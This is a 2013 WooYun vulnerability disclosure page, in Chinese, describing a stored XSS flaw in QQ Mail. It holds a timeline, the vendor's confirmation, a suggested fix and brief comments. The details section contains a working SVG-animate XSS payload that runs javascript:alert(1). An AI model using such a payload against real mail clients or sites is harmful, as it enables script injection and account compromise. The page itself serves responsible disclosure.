当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042664

漏洞标题:QQ邮箱一处存储型XSS漏洞

相关厂商:腾讯

漏洞作者: mramydnei

提交时间:2013-11-12 13:18

修复时间:2013-12-27 13:19

公开时间:2013-12-27 13:19

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-12: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经确认,细节仅向厂商公开
2013-11-23: 细节向核心白帽子及相关领域专家公开
2013-12-03: 细节向普通白帽子公开
2013-12-13: 细节向实习白帽子公开
2013-12-27: 细节向公众公开

简要描述:

过滤不严格

详细说明:

邮件正文没有对svg标签进行过滤,导致可通过animate标签的from属性执行javascript。

<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href><circle r=400></circle> <animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=& ></a>

漏洞证明:

2013-11-12 14:00:44的屏幕截图.png

修复方案:

过滤SVG。邮件正文应该用不上这个。

版权声明:转载请注明来源 mramydnei@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-11-13 17:58

厂商回复:

感谢反馈,问题已确认,目前正在联合业务修复中。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-12 13:29 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    Mark

  2. 2013-11-12 15:00 | blast ( 普通白帽子 | Rank:348 漏洞数:57 | 五仁委员会)

    你为何这么吊?

  3. 2013-11-12 16:24 | 豆浆小开 ( 实习白帽子 | Rank:39 漏洞数:5 | 我是打酱油的)

    草~

  4. 2013-11-12 19:18 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    MarK...

  5. 2013-12-15 22:41 | 猛虎 ( 路人 | Rank:21 漏洞数:4 | 分享快乐与痛苦。)

    太低调了

  6. 2013-12-17 08:27 | rasca1 ( 实习白帽子 | Rank:53 漏洞数:16 | 菜鸟一只)

    好低调。。。。。。

  7. 2013-12-17 17:01 | NoKing ( 路人 | Rank:15 漏洞数:2 | 一个垃圾罢了)

    你为何这么吊